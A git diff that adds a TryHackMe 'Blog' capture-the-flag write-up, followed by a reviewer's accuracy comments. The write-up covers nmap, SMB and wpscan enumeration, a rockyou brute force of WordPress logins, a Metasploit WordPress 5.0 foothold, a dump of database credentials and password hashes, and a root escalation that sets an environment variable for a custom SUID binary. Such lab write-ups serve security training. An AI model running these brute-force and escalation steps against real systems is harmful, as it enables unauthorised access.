diff --git a/TryHackMe/Blog.md b/TryHackMe/Blog.md new file mode 100644 index 0000000..a764a6f --- /dev/null +++ b/TryHackMe/Blog.md 
@@ -0,0 +1,375 @@ +# TryHackMe-Blog + +## NMAP + +``` +Nmap scan report for 10.10.62.12 +Host is up (0.17s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA) +| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA) +|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-generator: WordPress 5.0 +| http-robots.txt: 1 disallowed entry +|_/wp-admin/ +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Billy Joel's IT Blog – The IT blog +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) +Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Host script results: +|_nbstat: NetBIOS name: BLOG, NetBIOS user: , NetBIOS MAC: (unknown) +| smb-os-discovery: +| OS: Windows 6.1 (Samba 4.7.6-Ubuntu) +| Computer name: blog +| NetBIOS computer name: BLOG\x00 +| Domain name: \x00 +| FQDN: blog +|_ System time: 2020-11-11T18:34:52+00:00 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-11-11T18:34:52 +|_ start_date: N/A + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
+Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds +``` + +## PORT 139/445 (SMB) + +We know that there are smb shares on this box so let's see which shares we can access + + + +Let's grab the two photos from here and save it on our local machine + +``` +smb: \> get Alice-White-Rabbit.jpg +getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.8 KiloBytes/sec) (average 34.8 KiloBytes/sec) +smb: \> get check-this.png +getting file \check-this.png of size 3082 as check-this.png (4.5 KiloBytes/sec) (average 22.3 KiloBytes/sec) +smb: \> + +``` +Now we will see that there is a qr-image so use `zbarimg` to see what text we get from it + + + +``` +root@kali:~/TryHackMe/Medium/Blog# zbarimg check-this.png +QR-Code:https://qrgo.page.link/M6dE +``` +We will get a link that points to a video on youtube `Billy Joel - We Didn't Start the Fire (Official Video)` . + +This seems like a rabbithole .... + +``` +root@kali:~/TryHackMe/Medium/Blog# steghide --extract -sf Alice-White-Rabbit.jpg +Enter passphrase: +wrote extracted data to "rabbit_hole.txt". +root@kali:~/TryHackMe/Medium/Blog# cat rabbit_hole.txt +You've found yourself in a rabbit hole, friend. +root@kali:~/TryHackMe/Medium/Blog# +``` + +And I was right being in the wrong path :D + +## PORT 80 + +Moving on to web page + + + + + +Now your seeing this page like this because we have to add `blog.thm` into our `/etc/hosts/` + + + + +Now it's loading properly + +Looking at `robots.txt` + + + +I found a wordpress login page + + + + +## Gobuster + +`gobuster dir -u http://blog.thm -w /usr/share/wordlists/big.txt` +``` +2020/11/11 23:56:33 Starting gobuster +=============================================================== +/! 
(Status: 301) +/.htaccess (Status: 403) +/.htpasswd (Status: 403) +/0 (Status: 301) +/0000 (Status: 301) +/2020 (Status: 301) +/admin (Status: 302) +/asdfjkl; (Status: 301) +/atom (Status: 301) +/dashboard (Status: 302) +/embed (Status: 301) +/favicon.ico (Status: 200) +/feed (Status: 301) +/fixed! (Status: 301) +Progress: 9204 / 20470 (44.96% +``` +I didn't find anything interesting with gobuster so doing something with wordpress login page is the only way in + +## WPSCAN + +I used `wpscan` to enumerate for users and wordpress version + +``` +oot@kali:~/TryHackMe/Medium/Blog# wpscan -e --url 10.10.62.12 +_______________________________________________________________ + __ _______ _____ + \ \ / / __ \ / ____| + \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® + \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ + \ /\ / | | ____) | (__| (_| | | | | + \/ \/ |_| |_____/ \___|\__,_|_| |_| + + WordPress Security Scanner by the WPScan Team + Version 3.8.4 + Sponsored by Automattic - https://automattic.com/ + @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart +_______________________________________________________________ + +[+] URL: http://10.10.62.12/ [10.10.62.12] +[+] Started: Thu Nov 12 00:15:15 2020 + +Interesting Finding(s): + +[+] Headers + | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) + | Found By: Headers (Passive Detection) + | Confidence: 100% + +[+] http://10.10.62.12/robots.txt + | Interesting Entries: + | - /wp-admin/ + | - /wp-admin/admin-ajax.php + | Found By: Robots Txt (Aggressive Detection) + | Confidence: 100% + +[+] XML-RPC seems to be enabled: http://10.10.62.12/xmlrpc.php + | Found By: Direct Access (Aggressive Detection) +[i] User(s) Identified: + +[+] bjoel + | Found By: Wp Json Api (Aggressive Detection) + | - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1 + | Confirmed By: + | Author Id Brute Forcing - Author Pattern (Aggressive Detection) + | Login Error Messages (Aggressive Detection) + +[+] kwheel + | Found By: Wp Json Api (Aggressive 
Detection) + | - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1 + | Confirmed By: + | Author Id Brute Forcing - Author Pattern (Aggressive Detection) + | Login Error Messages (Aggressive Detection) + +[+] Karen Wheeler + | Found By: Rss Generator (Aggressive Detection) + +[+] Billy Joel + | Found By: Rss Generator (Aggressive Detection) + +[!] No WPVulnDB API Token given, as a result vulnerability data has not been output. +[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up + +[+] Finished: Thu Nov 12 00:17:18 2020 +[+] Requests Done: 3086 +[+] Cached Requests: 30 +[+] Data Sent: 762.895 KB +[+] Data Received: 1.192 MB +[+] Memory used: 230.801 MB +[+] Elapsed time: 00:02:03 + +``` +And I found two users `bjoel` and `kwheel` lets put this in a text file bruteforce thier passwords + +``` +wpscan --url http://blog.thm -U users.txt -P /usr/share/wordlists/rockyou.txt +_______________________________________________________________ + __ _______ _____ + \ \ / / __ \ / ____| + \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® + \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ + \ /\ / | | ____) | (__| (_| | | | | + \/ \/ |_| |_____/ \___|\__,_|_| |_| + + WordPress Security Scanner by the WPScan Team + Version 3.8.4 + Sponsored by Automattic - https://automattic.com/ + @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart +_______________________________________________________________ + +[+] URL: http://blog.thm/ [10.10.62.12] +[+] Started: Thu Nov 12 00:27:33 2020 + +Interesting Finding(s): + +[+] Headers + | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) + | Found By: Headers (Passive Detection) + | Confidence: 100% + +[+] http://blog.thm/robots.txt + | Interesting Entries: + [+] Enumerating All Plugins (via Passive Methods) + +[i] No plugins Found. 
+ +[+] Enumerating Config Backups (via Passive and Aggressive Methods) + Checking Config Backups - Time: 00:00:01 <=======================================================================> (21 / 21) 100.00% Time: 00:00:01 + +[i] No Config Backups Found. + +[+] Performing password attack on Xmlrpc against 2 user/s +[SUCCESS] - kwheel / cutiepie1 +Trying bjoel / heaven1 Time: 00:07:54 < > (6030 / 28691649) 0.02% +``` + +It took some time but we got `khweel`'s passwords + + + +And now we logged in as `khweel` in wordpress + +Then I did a litte resarch on goole if there's an exploit available for `wordpress 5.0` + + + + +So there's an exploit available for it on `metasploit` + + + +You could also search for it on `searchsploit` and it's going to show up as it's on `exploit-db` + + + +But I will be using metasploit because a tool is available for you why not use it :D + + + +I tried to use it but it kept failing, after quite sometime and restarted metasploit and then the exploit worked + + + +I didn't find anythin in `bjoel`'s home directory I quickly ran `linpeas` + + + + + + +These were the things I found out of linpeas + +``` +define('DB_NAME', 'blog'); +define('DB_USER', 'wordpressuser'); +define('DB_PASSWORD', 'LittleYellowLamp90!@'); +define('DB_HOST', 'localhost'); +``` +Now a mysql database must be ruuning on localhost so lets try to login with these credentials + + + +As we can see `DB_NAME` is `blog` + +``` +mysql> use blog +use blog +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> show tables; +show tables; ++-----------------------+ +| Tables_in_blog | ++-----------------------+ +| wp_commentmeta | +| wp_comments | +| wp_links | +| wp_options | +| wp_postmeta | +| wp_posts | +| wp_term_relationships | +| wp_term_taxonomy | +| wp_termmeta | +| wp_terms | +| wp_usermeta | +| wp_users | ++-----------------------+ +12 rows in set (0.00 sec) + +mysql> + 
+``` + +I ran command to select all entries in `wp_users` + +``` +mysql> select * from wp_users; +select * from wp_users; ++----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+ +| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | ++----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+ +| 1 | bjoel | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel | nconkl1@outlook.com | | 2020-05-26 03:52:26 | | 0 | Billy Joel | +| 3 | kwheel | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel | zlbiydwrtfjhmuuymk@ttirv.net | | 2020-05-26 03:57:39 | | 0 | Karen Wheeler | ++----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+ +``` +Let's try cracking these hashes + + + +But this was useless as we already got that password + + + +I then tried to run `/usr/sbin/checker` and it looked like it is customized + + + + +This looks like Buffer Overflow exploitation + + + + +This tells that there's variable that is holds bash variable `$admin`'s value and it's comparing it wheather it's empty or not so you can see that on null value it would terminate so we need to set the value true + +``` +www-data@blog:/media$ export admin=true +export admin=true +www-data@blog:/media$ echo $admin +echo $admin +true +www-data@blog:/media$ /usr/sbin/checker +/usr/sbin/checker +root@blog:/media# + +```
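Review bot: the privilege-escalation section at the end of the hunk contradicts itself: it first says `This looks like Buffer Overflow exploitation`, but the explanation and the commands that follow (`export admin=true` then `/usr/sbin/checker` dropping to `root@blog`) describe an environment-variable check, not memory corruption, and by that explanation (the binary only tests whether `$admin` is empty) any non-empty value would pass, so the "true" value is incidental; drop the buffer-overflow sentence and say plainly that `checker` trusts an attacker-controlled environment variable. Two more accuracy fixes: the wpscan output reports `[SUCCESS] - kwheel / cutiepie1`, yet the prose afterwards twice calls the user `khweel`, and the hosts-file step reads `/etc/hosts/`, which is the file `/etc/hosts`, not a directory. The foothold step is under-documented: the text says an exploit for `wordpress 5.0` exists in metasploit and on exploit-db but never names the module, the CVE, or the options set, and the MySQL login, linpeas and hash-cracking steps reference screenshots rather than commands; add the module name and the command lines so the write-up can be reproduced from text alone. Finally, proof-read the prose ("thier", "litte resarch on goole", "anythin", "ruuning", "wheather", "your seeing") before merging.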